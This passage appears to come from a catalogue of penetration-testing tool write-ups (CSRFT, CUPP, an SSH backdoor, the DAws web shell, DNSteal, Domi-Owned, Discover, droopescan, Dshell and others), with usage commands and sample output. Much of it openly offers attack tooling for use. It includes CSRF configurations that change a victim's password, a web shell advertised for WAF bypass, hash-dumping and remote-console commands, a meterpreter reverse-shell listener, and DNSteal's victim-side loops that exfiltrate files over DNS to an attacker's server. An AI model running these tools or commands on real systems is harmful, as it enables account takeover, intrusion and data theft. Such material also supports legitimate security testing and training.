toolkit. In few words, this is a simple HTTP Server in NodeJS
that will communicate with the clients (victims) and send them
payload that will be executed using JavaScript.
This has been developed entirely in NodeJS, and configuration
files are in JSON format.
* However, there's a tool in Python in utils folder that you can
use to automate CSRF exploitation. *
This project allows you to perform PoC (Proof Of Concepts)
really easily. Let's see how to get/use it.
How to get/use the tool
First, clone it :
$ git clone git@github.com:PaulSec/CSRFT.git
To make this project work, get the latest Node.js version here .
Go in the directory and install all the dependencies:
npm install
Then, launch the server.js :

$ node server.js
Usage will be displayed :

Usage : node server.js <file.json> <port : default 8080>
More information
By default, the server will be launched on the port 8080, so you

can access it via : http://0.0.0.0:8080 .
The JSON file must describe your several attack scenarios. It
can be wherever you want on your hard drive.
The index page displayed on the browser is accessible via : /
views/index.ejs .
You can change it as you want and give the link to your victim.
Different folders : What do they mean ?
The idea is to provide a 'basic' hierarchy (of the folders) for your
projects. I made the script quite modular so your configuration
files/malicious forms, etc. don't have to be in those folders
though. This is more like a good practice/advice for your future
projects.
However, here is a little summary of those folders :
conf folder : add your JSON configuration file with your
configuration.
exploits folder : add all your *.html files containing
your forms
public folder : containing jquery.js and inject.js (script
loaded when accessing 0.0.0.0:8080)

views folder : index file and exploit template
dicos : Folder containing all your dictionnaries for those
attacks
lib : libs specific for my project (custom ones)
utils : folder containing utils such as : csrft_utils.py
which will launch CSRFT directly.
server.js file - the HTTP server
Configuration file templates
GET Request with special value

Here is a basic example of JSON configuration file that will
target www.vulnerable.com This is a special value because
the malicious payload is already in the URL/form.
{
"audit": {
"name": "PoC done with Automatic Tool",
"scenario": [
{
"attack": [
{
"method": "GET",
"type_attack": "special_value",
"url": "http://www.vulnerable.com/
changePassword.php?newPassword=csrfAttacks"
}
]
}
]
}
}
GET Request with dictionnary attack

Here is a basic example of JSON configuration file. For every
entry in the dictionnary file, there will be a HTTP Request done.
{
"audit": {
"scenario": [
{
"attack": [
{
"file": "./dicos/passwords.txt",
"method": "GET",
"type_attack": "dico",
"url": "http://www.vulnerable.com/
changePassword.php?newPassword=<%value%>"
}
]
}
]
}
}
POST Request with special value attack

{
"audit": {
"scenario": [
{
"attack": [
{
"form": "/tmp/csrft/form.html",
"method": "POST",
"type_attack": "special_value"
}
]
}
]
}
}
The form already includes the malicious payload. So it just has

to be executed by the victim.
I hope you understood the principles. I didn't write an example
for a POST with dictionnary attack because there will be one in
the next section.
Ok but what do Scenario and Attack mean ?
A scenario is composed of attacks. Those attacks can be

simultaneous or at different time.
For example, you want to sign the user in and THEN , you want
him to perform some unwanted actions. You can specify it in
the JSON file.
Let's take an example with both POST and GET Request :
{
"audit": {
"name": "DeepSec | Login the admin, give
privilege to the Hacker and log him out",
"scenario": [
{
"attack": [
{
"method": "POST",
"type_attack": "dico",
"file": "passwords.txt",
"form":
"deepsec_form_log_user.html",
"comment": "attempt to connect
the admin with a list of selected passwords"

}
]
},
{
"attack": [
{
"method": "GET",
"url": "http://192.168.56.1/vulnwebsite/index.php/welcome/upgrade/27",
"comment": "then, after the login
session, we expect the admin to be logged in, attempt to
upgrade our account"
}
]
},
{
"attack": [
{
"method": "GET",
"url": "http://192.168.56.1/vulnwebsite/index.php/welcome/logout",
"comment": "The final step is to
logout the admin"
}
]
}
]
}
}
You can now define some "steps", different attacks that will be
executed in a certain order.
Use cases
A) I want to write my specific JSON configuration file and

launch it by hand
Based on the templates which are available, you can easily
create your own. If you have any trouble creating it, feel free to
contact me and I'll try to help you as much as I can but it
shoudn't be this complicated.
Steps to succeed :
1) Create your configuration file, see samples in conf/ folder
2) Add your .html files in the exploits/ folder with the different
payloads if the CSRF is POST vulnerable
3) If you want to do Dictionnary attack, add your dictionnary file
to the dicos/ folder,
4) Replace the value of the field you want to perform this attack
with the token <%value%>
=> either in your urls if GET exploitation, or in the HTML files if
POST exploitation.
5) Launch the application : node server.js conf/test.json
B) I want to automate attacks really easily

To do so, I developed a Python script csrft_utils.py in utils
folder that will do this for you.
Here are some basic use cases :
* GET parameter with Dictionnary attack : *
$ python csrft_utils.py --url="http://www.vulnerable.com/
changePassword.php?newPassword=csvulnerableParameter" -param=newPassword --dico_file="../dicos/passwords.txt"
* POST parameter with Special value attack : *
$ python csrft_utils.py --form=http://website.com/

user.php --id=changePassword --param=password
password=newPassword --special_value
Download CSRFT
CUPP - COMMON USER PASSWORDS PROFILER
The most common form of authentication is the combination of

a username and a password or passphrase. If both match
values stored within a locally stored table, the user is
authenticated for a connection. Password strength is a
measure of the difficulty involved in guessing or breaking the
password through cryptographic techniques or library-based
automated testing of alternate values.
A weak password might be very short or only use

alphanumberic characters, making decryption simple. A weak
password can also be one that is easily guessed by someone
profiling the user, such as a birthday, nickname, address, name
of a pet or relative, or a common word such as God, love,
money or password.
That is why CUPP has born, and it can be used in situations
like legal penetration tests or forensic crime investigations.
Options
Usage: cupp.py [OPTIONS]

-h
this menu
-i
Interactive questions for user password
profiling
-w
Use this option to profile existing
dictionary,
or WyD.pl output to make some pwnsauce :)
-l
Download huge wordlists from repository
-a
Parse default usernames and passwords
directly from Alecto DB.

Project Alecto uses purified databases of
Phenoelit and CIRT which where merged and enhanced.
-v
Version of the program
Configuration
CUPP has configuration file cupp.cfg with instructions.
DownloadCupp
CUSTOM-SSH-BACKDOOR - SSH BACKDOOR USING
PARAMIKO
Custom ssh backdoor, coded in python using Paramiko.

Paramiko is a Python (2.6+, 3.3+) implementation of the
SSHv2 protocol, providing both client and server functionality.
While it leverages a Python C extension for low level
cryptography (PyCrypto), Paramiko itself is a pure Python
interface around SSH networking concepts.
DownloadCustom-SSH-Backdoor
DAMN VULNERABLE WEB APP - PHP/MYSQL TRAINING
WEB APPLICATION THAT IS DAMN VULNERABLE
Damn Vulnerable Web App (DVWA) is a PHP/MySQL web

application that is damn vulnerable. Its main goals are to be an
aid for security professionals to test their skills and tools in a
legal environment, help web developers better understand the
processes of securing web applications and aid teachers/
students to teach/learn web application security in a class room
environment.
WARNING!
Damn Vulnerable Web App is damn vulnerable! Do not upload
it to your hosting provider's public html folder or any working
web server as it will be hacked. I recommend downloading and
installing XAMPP onto a local machine inside your LAN which
is used solely for testing.
We do not take responsibility for the way in which any one uses
Damn Vulnerable Web App (DVWA). We have made the
purposes of the application clear and it should not be used
maliciously. We have given warnings and taken measures to
prevent users from installing DVWA on to live web servers. If

your web server is compromised via an installation of DVWA it
is not our responsibility it is the responsibility of the person/s
who uploaded and installed it.
DownloadDamn Vulnerable Web App

DAWS - ADVANCED WEB SHELL (WINDOWS/LINUX)
There's multiple things that makes DAws better than every Web
Shell out there:
1. Bypasses Disablers; DAws isn't just about using a
particular function to get the job done, it uses up to 6
functions if needed, for example, if shell_exec was
disabled it would automatically use exec or passthru or
system or popen or proc_open instead, same for
2.
3.
4.
5.
6.
7.
Downloading a File from a Link, if Curl was disabled then

file_get_content is used instead and this Feature is widely
used in every section and fucntion of the shell.
Automatic Encoding; DAws randomly and automatically
encodes most of your GET and POST data using
XOR(Randomized key for every session) + Base64(We
created our own Base64 encoding functions instead of
using the PHP ones to bypass Disablers) which will allow
your shell to Bypass pretty much every WAF out there.
Advanced File Manager; DAws's File Manager contains
everything a File Manager needs and even more but the
main Feature is that everything is dynamically printed; the
permissions of every File and Folder are checked, now,
the functions that can be used will be available based on
these permissions, this will save time and make life much
easier.
Tools: DAws holds bunch of useful tools such as "bpscan"
which can identify useable and unblocked ports on the
server within few minutes which can later on allow you to
go for a bind shell for example.
Everything that can't be used at all will be simply removed
so Users do not have to waste their time. We're for
example mentioning the execution of c++ scripts when
there's no c++ compilers on the server(DAws would have
checked for multiple compilers in the first place) in this
case, the function would be automatically removed and
the User would know.
Supports Windows and Linux.
Openned Source.
Extra Info
Eval Form:
ìnclude` is being used instead PHP èval` to bypass
Protection Systems.
Download from Link - Methods:
PHP Curl
File_put_content
Zip - Methods:
Linux:
Zip
Windows:
Vbs Script
Shells and Tools:
Extra:
`nohup`, if installed, is automatically used for
background processing.
DownloadDAws
DHARMA - A GENERATION-BASED, CONTEXT-FREE
GRAMMAR FUZZER
A generation-based, context-free grammar fuzzer.

Requirements
None
Examples
Generate a single test-case.

% ./dharma.py -grammars grammars/webcrypto.dg
Generate a single test case with multiple grammars.
% ./dharma.py -grammars grammars/canvas2d.dg grammars/

mediarecorder.dg
Generating test-cases as files.

% ./dharma.py -grammars grammars/webcrypto.dg -storage .
-count 5
Generate test-cases, send each over WebSocket to Firefox,

observe the process for crashes and bucket them.
% ./dharma.py -server -grammars grammars/canvas2d.dg template grammars/var/templates/html5/default.html
% ./framboise.py -setup inbound64-release -debug -worker
4 -testcase ~/dev/projects/fuzzers/dharma/grammars/var/
index.html
Benchmark the generator.

% time ./dharma.py -grammars grammars/webcrypto.dg -count
10000 > /dev/null
Grammar Cheetsheet
Comment
%%% comment
Controls
%const% name := value
Sections
%section% := value
%section% := variable
%section% := variance
Extension methods
%range%(0-9)
%range%(0.0-9.0)
%range%(a-z)
%range%(!-~)
%range%(0x100-0x200)
%repeat%(+variable+)
%repeat%(+variable+, ", ")
%uri%(path)
%uri%(lookup_key)
%block%(path)
%choice%(foo, "bar", 1)
Assigning values
digit :=
%range%(0-9)
sign :=
+
value :=
+sign+%repeat%(+digit+)
Using values
+value+
Assigning variables
variable :=
@variable@ = new Foo();
Using variables
value :=
!variable!.bar();
Referencing values from common.dg

value :=
attribute=+common:number+
Calling javascript library functions

foo :=
Random.pick([0,1]);
DownloadDharma
DIRS3ARCH V0.3.0 - HTTP(S) DIRECTORY/FILE BRUTE
FORCER
dirs3arch is a simple command line tool designed to brute force
hidden directories and files in websites.

It's written in python3 3 and all thirdparty libraries are included.
Operating Systems supported
Windows XP/7/8
GNU/Linux
MacOSX
Features
Multithreaded
Keep alive connections
Support for multiple extensions (-e|--extensions asp,php)
Reporting (plain text, JSON)
Detect not found web pages when 404 not found errors
are masked (.htaccess, web.config, etc).
Recursive brute forcing
HTTP(S) proxy support
Batch processing (-L)
Examples
Scan www.example.com/admin/ to find php files:

python3 dirs3arch.py -u http://www.example.com/admin/
-e php
Scan www.example.com to find asp and aspx files

with SSL:
python3 dirs3arch.py -u https://www.example.com/ -e
asp,aspx
Scan www.example.com with an alternative dictionary

(from DirBuster):
python3 dirs3arch.py -u http://www.example.com/ -e
php -w db/dirbuster/directory-list-2.3-small.txt
Scan with HTTP proxy (localhost port 8080):

-e php --http-proxy localhost:8080
Scan with custom User-Agent and custom header

(Referer):
-e php --user-agent "My User-Agent" --header
"Referer: www.google.com"
Scan recursively:
-e php -r
Scan recursively excluding server-status directory

and 200 status codes:
php -r --exclude-subdir "server-status" --excludestatus 200
Scan includes, classes directories in /admin/

-e php --scan-subdir "includes, classes"
Scan without following HTTP redirects:

php --no-follow-redirects
Scan VHOST "backend" at IP 192.168.1.1:

python3 dirs3arch.py -u http://backend/ --ip
192.168.1.1
Scan www.example.com to find wordpress plugins:

python3 dirs3arch.py -u http://www.example.com/
wordpress/wp-content/plugins/ -e php -w db/wordpress/
plugins.txt
Batch processing:
python3 dirs3arch.py -L urllist.txt -e php
Thirdparty code
colorama
oset
urllib3
sqlmap
Changelog
0.3.0 - 2015.2.5 Fixed issue3, fixed timeout exception,

ported to python33, other bugfixes
0.2.7 - 2014.11.21 Added Url List feature (-L). Changed
output. Minor Fixes
0.2.6 - 2014.9.12 Fixed bug when dictionary size is
greater than threads count. Fixed URL encoding bug
(issue2).
0.2.5 - 2014.9.2 Shows Content-Length in output and
reports, added default.conf file (for setting defaults) and
report auto save feature added.
0.2.4 - 2014.7.17 Added Windows support, --scansubdir|--scan-subdirs argument added, --exclude-subdir|-exclude-subdirs added, --header argument added,
dirbuster dictionaries added, fixed some concurrency
bugs, MVC refactoring

0.2.3 - 2014.7.7 Fixed some bugs, minor refactorings,
exclude status switch, "pause/next directory" feature,
changed help structure, expaded default dictionary
0.2.2 - 2014.7.2 Fixed some bugs, showing percentage of
tested paths and added report generation feature
0.2.1 - 2014.5.1 Fixed some bugs and added recursive
option
0.2.0 - 2014.1.31 Initial public release
DownloadDirs3arch
DISCOVER - CUSTOM BASH SCRIPTS USED TO
AUTOMATE VARIOUS PENTESTING TASKS
For use with Kali Linux. Custom bash scripts used to automate
various pentesting tasks.
Download, setup & usage
git clone git://github.com/leebaird/discover.git /opt/

discover/
All scripts must be ran from this location.
cd /opt/discover/
./setup.sh
./discover.sh
RECON
1.
Domain
2.
Person
3.
Parse salesforce
SCANNING
4.
Generate target list
5.
CIDR
6.
List
7.
IP or domain
WEB
8.
Open multiple tabs in Iceweasel
9.
Nikto
10. SSL
MISC
11. Crack WiFi
12. Parse XML
13. Start a Metasploit listener
14. Update
15. Exit
RECON
Domain
RECON
1.
Passive
2.
Active
3.
Previous menu
Passive combines goofile, goog-mail, goohost,

theHarvester, Metasploit, dnsrecon, URLCrazy, Whois
and multiple webistes.
Active combines Nmap, dnsrecon, Fierce, lbd, WAF00W,
traceroute and Whatweb.
Person
RECON
First name:
Last name:
Combines info from multiple websites.
Parse salesforce
Create a free account at salesforce (https://
connect.data.com/login).
Perform a search on your target company > select the
company name > see all.
Copy the results into a new file.
Enter the location of your list:
Gather names and positions into a clean list.
SCANNING
Generate target list

SCANNING
1.
Local area network
2.
NetBIOS
3.
netdiscover
4.
Ping sweep
5.
Previous menu
Use different tools to create a target list including Angry IP

Scanner, arp-scan, netdiscover and nmap pingsweep.
CIDR, List, IP or domain

Type of scan:
1.
External
2.
Internal
3.
Previous menu
External scan will set the nmap source port to 53 and the
max-rrt-timeout to 1500ms.
Internal scan will set the nmap source port to 88 and the
max-rrt-timeout to 500ms.
Nmap is used to perform host discovery, port scanning,
service enumeration and OS identification.
Matching nmap scripts are used for additional
enumeration.
Matching Metasploit auxiliary modules are also leveraged.
WEB
Open multiple tabs in Icewease
Open multiple tabs in Iceweasel with:
1.
List
2.
Directories from a domain's robot.txt.
3.
Previous menu
Use a list containing IPs and/or URLs.

Use wget to pull a domain's robot.txt file, then open all of
the directories.
Nikto
Run multiple instances of Nikto in parallel.

1.
List of IPs.
2.
List of IP:port.
3.
Previous menu
SSL
Check for SSL certificate issues.
Enter the location of your list:
Use sslscan and sslyze to check for SSL/TLS certificate

issues.
MISC
Crack WiFi
Crack wireless networks.
Parse XML
Parse XML to CSV.
1.
Burp (Base64)
2.
Nessus
3.
Nexpose
4.
Nmap
5.
Qualys
6.
Previous menu
Start a Metasploit listener

Setup a multi/handler with a windows/meterpreter/
reverse_tcp payload on port 443.
Update
Use to update Kali Linux, Discover scripts, various tools

and the locate database.
Download Discover
DNSTEAL - DNS EXFILTRATION TOOL FOR STEALTHILY
SENDING FILES OVER DNS REQUESTS
This is a fake DNS server that allows you to stealthily extract
files from a victim machine through DNS requests.
Below is an image showing an example of how to use:
On the victim machine, you simply can do something like so:

for b in $(xxd -p file/to/send.png); do dig @server
$b.filename.com; done
Support for multiple files

for filename in $(ls); do for b in $(xxd -p $f); do dig
+short @server %b.$filename.com; done; done
gzip compression supported

It also supports compression of the file to allow for faster
transfer speeds, this can be achieved using the "-z" switch:

python dnsteal.py 127.0.0.1 -z
Then on the victim machine send a Gzipped file like so:

for b in $(gzip -c file/to/send.png | xxd -p); do dig
@server $b.filename.com; done
or for multiple, gzip compressed files:

for filename in $(ls); do for b in $(gzip -c $filename |
xxd -p); do dig +short @server %b.$filename.com; done;
done
DownloadDNSteal
DOMI-OWNED - TOOL USED FOR COMPROMISING IBM/
LOTUS DOMINO SERVERS
Domi-Owned is a tool used for compromising IBM/Lotus

Domino servers.
Tested on IBM/Lotus Domino 8.5.2, 8.5.3, 9.0.0, and 9.0.1
running on Windows and Linux.
USAGE
A valid username and password is not required unless
'names.nsf' and/or 'webadmin.nsf' requires authentication.
FINGERPRINTING
Running Domi-Owned with just the

--url
flag will attempt to identify the Domino server version, as well

as check if 'names.nsf' and 'webadmin.nsf' requires
authentication.
If a username and password is given, Domi-Owned will check
to see if that account can access 'names.nsf' and
'webadmin.nsf' with those credentials.
REVERSE BRUTEFORCE
To perform a Reverse Bruteforce attack against a Domino

server, specify a file containing a list of usernames with
-U
, a password with
-p
, and the
--bruteforce
flag. Domi-Owned will then try to authenticate to 'names.nsf',

returning successful accounts.
DUMP HASHES
To dump all Domino accounts with a non-empty hash from

'names.nsf', run Domi-Owned with the
--hashdump
flag. This prints the results to the screen and writes them to
separate out files depending on the hash type (Domino 5,
Domino 6, Domino 8).
QUICK CONSOLE
The Domino Quick Console is active by default; however, it will

not show the command's output. A work around to this problem
is to redirect the command output to a file, in this case 'log.txt',
that is then displayed as a web page on the Domino server.
If the
--quickconsole
flag is given, Domi-Owned will access the Domino Quick

Console, through 'webadmin.nsf', allowing the user to issue
native Windows or Linux commands. Domi-Owned will then
retrieve the output of the command and display the results in
real time, through a command line interpreter. Type

exit
to quit the Quick Console interpreter, which will also delete the
'log.txt' output file.
EXAMPLES
FINGERPRINT DOMINO SERVER
python domi-owned.py --url http://domino-server.com

PREFORM A REVERSE BRUTEFORCE ATTACK
python domi-owned.py --url http://domino-server.com -U ./

usernames.txt -p password --bruteforce
DUMP DOMINO ACCOUNT HASHES
python domi-owned.py --url http://domino-server.com -u

user -p password --hashdump
INTERACT WITH THE DOMINO QUICK CONSOLE
python domi-owned.py --url http://domino-server.com -u

user -p password --quickconsole
DownloadDomi-Owned
DOUBLE THE BANG FOR YOUR BUCK WITH ACUNETIX
VULNERABILITY SCANNER
Acunetix have announced that they are extending their current

free offering of the network security scan, part of their cloudbased web and network vulnerability scanner. Those signing up
for a trial of the online version of Acunetix vulnerability scanner
will now be able to scan their perimeter servers for network
security issues on up to 3 targets with no expiry.
In addition, existing Acunetix customers will also be able to
double up on their current license-based quota of scan targets
by adding the same amount of network scans. i.e a 25 scan
target license can now make use of an extra 25 network-only
scan targets for free.
An analysis of scans performed over the past year following the
launch of Acunetix Vulnerability Scanner (online version) show
that on average 50% of the targets scanned have a medium or
high network security vulnerability. Its worrying that in the
current cybersecurity climate, network devices remain
vulnerable to attack. The repercussions of a vulnerable network
are catastrophic as seen in some recent, well publicised Lizard

Squad attacks, the black hat hacking group, mainly known for
their claims of DoS attacks.
Acunetix secure the websites of some of the biggest global
enterprises, and with our online vulnerability scanner we are
not only bringing this technology within reach of many more
businesses but we are also providing free network security
scanning technology to aid smaller companies secure their
network, said Nick Galea, CEO of Acunetix.
How Acunetix keeps perimeter servers secure
A network security scan checks the perimeter servers, locating

any vulnerabilities in the operating system, server software,
network services and protocols. Acunetix network security scan
uses the OpenVAS database of network vulnerabilities and
scans for more than 35,000 network level vulnerabilities. A
network scan is where vulnerabilities such as Shellshock,
Heartbleed and POODLE are detected, vulnerabilities which
continue to plague not only web servers but also a large
percentage of other network servers. A network scan will also:
Detect misconfigurations and vulnerabilities in OS, server

applications, network services, and protocols
Assess security of detected devices (routers, hardware
firewalls, switches and printers)
Scan for trojans, backdoors, rootkits, and other malware
that can be detected remotely
Test for weak passwords on FTP, IMAP, SQL servers,
POP3, Socks, SSH, Telnet
Check for DNS server vulnerabilities such as Open Zone
Transfer, Open Recursion and Cache Poisoning
Test FTP access such as anonymous access potential
and a list of writable FTP directories
Check for badly configured Proxy Servers, weak SNMP
Community Strings, weak SSL ciphers and many other

security weaknesses.
Register for a free trial and start scanning http://
www.acunetix.com/free-network-security-scanner/
About Acunetix
Acunetix is the market leader in web application security

technology, founded to combat the alarming rise in web
attacks. Its products and technologies are the result of a
decade of work by a team of highly experienced security
developers. Acunetix customers include the U.S. Army, KPMG,
Adidas and Fujitsu. More information can be found at
www.acunetix.com.
DROOPESCAN - SCANNER TO IDENTIFY ISSUES WITH

SEVERAL CMSS, MAINLY DRUPAL & SILVERSTRIPE
A plugin-based scanner that aids security researchers in

identifying issues with several CMS:
Drupal.
SilverStripe.
Partial functionality for:
Wordpress.
Joomla.
computer:~/droopescan$ droopescan scan drupal -u http://

example.org/ -t 8
[+] No themes found.
[+] Possible interesting urls found:
Default changelog file - https://www.example.org/
CHANGELOG.txt
Default admin - https://www.example.org/user/login
[+] Possible version(s):
7.34
[+] Plugins found:
views https://www.example.org/sites/all/modules/
views/
https://www.example.org/sites/all/modules/views/
README.txt
https://www.example.org/sites/all/modules/views/
LICENSE.txt
token https://www.example.org/sites/all/modules/
token/
https://www.example.org/sites/all/modules/token/
README.txt
https://www.example.org/sites/all/modules/token/
LICENSE.txt
pathauto https://www.example.org/sites/all/modules/
pathauto/
https://www.example.org/sites/all/modules/
pathauto/README.txt
pathauto/LICENSE.txt
pathauto/API.txt
libraries https://www.example.org/sites/all/modules/
libraries/
libraries/CHANGELOG.txt
libraries/README.txt
libraries/LICENSE.txt
entity https://www.example.org/sites/all/modules/
entity/
https://www.example.org/sites/all/modules/entity/
README.txt
https://www.example.org/sites/all/modules/entity/
LICENSE.txt
google_analytics https://www.example.org/sites/all/
modules/google_analytics/
google_analytics/README.txt
google_analytics/LICENSE.txt
ctools https://www.example.org/sites/all/modules/
ctools/
https://www.example.org/sites/all/modules/ctools/
CHANGELOG.txt
LICENSE.txt
API.txt
features https://www.example.org/sites/all/modules/
features/
features/CHANGELOG.txt
features/README.txt
features/LICENSE.txt
features/API.txt
[... snip for README ...]
[+] Scan finished (0:04:59.502427 elapsed)
You can get a full list of options by running:

droopescan --help
droopescan scan --help
Why not X?
Because droopescan:
is fast
is stable
is up to date
allows simultaneous scanning of multiple sites
is 100% python
Installation
Installation is easy using pip:

apt-get install python-pip
pip install droopescan
Manual installation is as follows:

git clone https://github.com/droope/droopescan.git
cd droopescan
pip install -r requirements.txt
droopescan scan --help
The master branch corresponds to the latest release (what is in

pypi). Development branch is unstable and all pull requests
must be made against it. More notes regarding installation can
be found here.
Features
Scan types.
Droopescan aims to be the most accurate by default, while not
overloading the target server due to excessive concurrent
requests. Due to this, by default, a large number of requests
will be made with four threads; change these settings by using
the --number and --threads arguments respectively.
This tool is able to perform four kinds of tests. By default all
tests are ran, but you can specify one of the following with the e or --enumerate flag:
p -- Plugin checks: Performs several thousand HTTP
requests and returns a listing of all plugins found to be
installed in the target host.
t -- Theme checks: As above, but for themes.
v -- Version checks: Downloads several files and, based
on the checksums of these files, returns a list of all
possible versions.
i -- Interesting url checks: Checks for interesting urls
(admin panels, readme files, etc.)
More notes regarding scanning can be found here.
Target specification
You can specify a particular host to scan by passing the -u or

--url parameter:
droopescan scan drupal -u example.org
You can also omit the drupal argument. This will trigger CMS
identification, like so:
droopescan scan -u example.org
Multiple URLs may be scanned utilising the -U or --url-file

parameter. This parameter should be set to the path of a file
which contains a list of URLs.
droopescan scan drupal -U list_of_urls.txt
The drupal parameter may also be ommited in this example.

For each site, it will make several GET requests in order to
perform CMS identification, and if the site is deemed to be a
supported CMS, it is scanned and added to the output list. This
can be useful, for example, to run droopescan across all your
organisation's sites.
droopescan scan -U list_of_urls.txt
The code block below contains an example list of URLs, one

per line:
http://localhost/drupal/6.0/
A file containing URLs and a value to override the default host

header with separated by tabs or spaces is also OK for URL
files. This can be handy when conducting a scan through a
large range of hosts and you want to prevent unnecessary DNS
queries. To clarify, an example below:
192.168.1.1 example.org
http://192.168.1.1/ example.org
http://192.168.1.2/drupal/
example.org
It is quite tempting to test whether the scanner works for a
particular CMS by scanning the official site (e.g.

wordpress.org for wordpress), but the official sites rarely run
vainilla installations of their respective CMS or do unorthodox
things. For example, wordpress.org runs the bleeding edge
version ofwordpress, which will not be identified as wordpress
by droopescan at all because the checksums do not match any
known wordpress version.
Authentication
The application fully supports .netrc files and http_proxy
environment variables.
You can set the http_proxy and https_proxy variables. These
allow you to set a parent HTTP proxy, in which you can handle
more complex types of authentication (e.g. Fiddler, ZAP, Burp)
export http_proxy='user:password@localhost:8080'
export https_proxy='user:password@localhost:8080'
droopescan scan drupal --url http://localhost/drupal
Another option is to use a .netrc file for basic authentication. An

example ~/.netrc file could look as follows:
machine secret.google.com
login admin@google.com
password Winter01
WARNING: By design, to allow intercepting proxies and the

testing of applications with bad SSL, droopescan allows selfsigned or otherwise invalid certificates.
Output
This application supports both "standard output", meant for
human consumption, or JSON, which is more suitable for
machine consumption. This output is stable between major
versions.
This can be controlled with the --output flag. Some sample
JSON output would look as follows (minus the excessive

whitespace):
{
"themes": {
"is_empty": true,
"finds": [
]
},
"interesting urls": {
"is_empty": false,
"finds": [
{
"url": "https:\/\/www.drupal.org\/CHANGELOG.txt",
"description": "Default changelog file."
},
{
"url": "https:\/\/www.drupal.org\/user\/login",
"description": "Default admin."
}
]
},
"version": {
"is_empty": false,
"finds": [
"7.29",
"7.30",
"7.31"
]
},
"plugins": {
"is_empty": false,
"finds": [
{
"url": "https:\/\/www.drupal.org\/sites\/all\/
modules\/views\/",
"name": "views"
},
[...snip...]
]
}
}
Some attributes might be missing from the JSON object if parts

of the scan are not ran.
This is how multi-site output looks like; each line contains a
valid JSON object as shown above.
$ droopescan scan drupal -U six_and_above.txt -e v
{"host": "http://localhost/drupal-7.6/", "version":
{"is_empty": false, "finds": ["7.6"]}}


Download Droopescan
DSHELL - NETWORK FORENSIC ANALYSIS FRAMEWORK
An extensible network forensic analysis framework. Enables

rapid development of plugins to support the dissection of
network packet captures.
Key features:
Robust stream reassembly
IPv4 and IPv6 support
Custom output handlers
Chainable decoders
Prerequisites
Linux (developed on Ubuntu 12.04)

Python 2.7
pygeoip, GNU Lesser GPL
MaxMind GeoIP Legacy datasets
PyCrypto, custom license
dpkt, New BSD License
IPy, BSD 2-Clause License
pypcap, New BSD License
Installation
1. Install all of the necessary Python modules listed above.

Many of them are available via pip and/or apt-get. Pygeoip
is not yet available as a package and must be installed
with pip or manually. All except dpkt are available with pip.
1. sudo apt-get install python-crypto
dpkt python-ipy python-pypcap
2. sudo pip install pygeoip
python-
2. Configure pygeoip by moving the MaxMind data files

(GeoIP.dat, GeoIPv6.dat, GeoIPASNum.dat,
GeoIPASNumv6.dat) to /share/GeoIP/
3. Run make. This will build Dshell.
4. Run ./dshell. This is Dshell. If you get a Dshell> prompt,
you're good to go!
Basic usage
decode -l
decode -h
Show generic command-line flags available to most

decoders
decode -d <decoder>
This will list all available decoders alongside basic

information about them
Display information about a decoder, including

available command-line flags
decode -d <decoder> <pcap>
Run the selected decoder on a pcap file
Usage Examples
Showing DNS lookups in sample traffic

Dshell> decode -d dns ~/pcap/dns.cap
dns 2005-03-30 03:47:46
192.168.170.20:53
192.168.170.8:32795 ->
** 39867 PTR? 66.192.9.104 / PTR:
66-192-9-104.gen.twtelecom.net **
dns 2005-03-30 03:47:46
192.168.170.20:53
192.168.170.8:32795 ->
** 30144 A? www.netbsd.org / A:
204.152.190.12 (ttl 82159s) **

dns 2005-03-30 03:47:46
192.168.170.20:53
192.168.170.8:32795 ->
** 61652 AAAA? www.netbsd.org /
AAAA: 2001:4f8:4:7:2e0:81ff:fe52:9a6b (ttl 86400s) **

dns 2005-03-30 03:47:46
192.168.170.20:53
192.168.170.8:32795 ->
** 32569 AAAA? www.netbsd.org /
AAAA: 2001:4f8:4:7:2e0:81ff:fe52:9a6b (ttl 86340s) **

dns 2005-03-30 03:47:46
192.168.170.20:53
192.168.170.8:32795 ->
** 36275 AAAA? www.google.com /
CNAME: www.l.google.com **
dns 2005-03-30 03:47:46
192.168.170.20:53
192.168.170.8:32795 ->
** 9837 AAAA? www.example.notginh /
NXDOMAIN **
dns 2005-03-30 03:52:17
192.168.170.20:53
192.168.170.8:32796 <-
** 23123 PTR? 127.0.0.1 / PTR:
localhost **
dns 2005-03-30 03:52:25
217.13.4.24:53
192.168.170.56:1711
<-
** 30307 A? GRIMM.utelsystems.local /
NXDOMAIN **
dns 2005-03-30 03:52:17
217.13.4.24:53
192.168.170.56:1710
<-
** 53344 A? GRIMM.utelsystems.local /
NXDOMAIN **
Following and reassembling a stream in sample traffic

Dshell> decode -d followstream ~/pcap/v6-http.cap
Connection 1 (TCP)
Start: 2007-08-05 19:16:44.189852 UTC
End: 2007-08-05 19:16:44.204687 UTC
2001:6f8:102d:0:2d0:9ff:fee3:e8de:59201 ->
2001:6f8:900:7c0::2:80 (240 bytes)
2001:6f8:900:7c0::2:80 -> 2001:6f8:102d:
0:2d0:9ff:fee3:e8de:59201 (2259 bytes)
GET / HTTP/1.0
Host: cl-1985.ham-01.de.sixxs.net
Accept: text/html, text/plain, text/css, text/sgml, */
*;q=0.01
Accept-Encoding: gzip, bzip2
Accept-Language: en
User-Agent: Lynx/2.8.6rel.2 libwww-FM/2.14 SSL-MM/1.4.1
OpenSSL/0.9.8b
HTTP/1.1 200 OK
Date: Sun, 05 Aug 2007 19:16:44 GMT
Server: Apache
Content-Length: 2121
Connection: close
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /</title>
</head>
<body>
<h1>Index of /</h1>
<pre><img src="/icons/blank.gif" alt="Icon "> <a href="?
C=N;O=D">Name</a>
<a href="?
C=M;O=A">Last modified</a>
a>
<a href="?C=S;O=A">Size</
<a href="?C=D;O=A">Description</a><hr><img src="/
icons/folder.gif" alt="[DIR]"> <a href="202vorbereitung/">202-vorbereitung/</a>

14:31
06-Jul-2007
<img src="/icons/layout.gif" alt="[
]"> <a
href="Efficient_Video_on_demand_over_Multicast.pdf">Effic
ient_Video_on_d..></a> 19-Dec-2006 03:17
<img src="/icons/unknown.gif" alt="[
291K
]"> <a
href="Welcome%20Stranger!!!">Welcome Stranger!!!</a>
28-Dec-2006 03:46
<img src="/icons/text.gif" alt="[TXT]"> <a

href="barschel.htm">barschel.htm</a>
Jul-2007 02:21
31-
44K
<img src="/icons/folder.gif" alt="[DIR]"> <a

href="bnd/">bnd/</a>
30-Dec-2006 08:59

href="cia/">cia/</a>
28-Jun-2007 00:04
]"> <a
href="cisco_ccna_640-801_command_reference_guide.pdf">cis
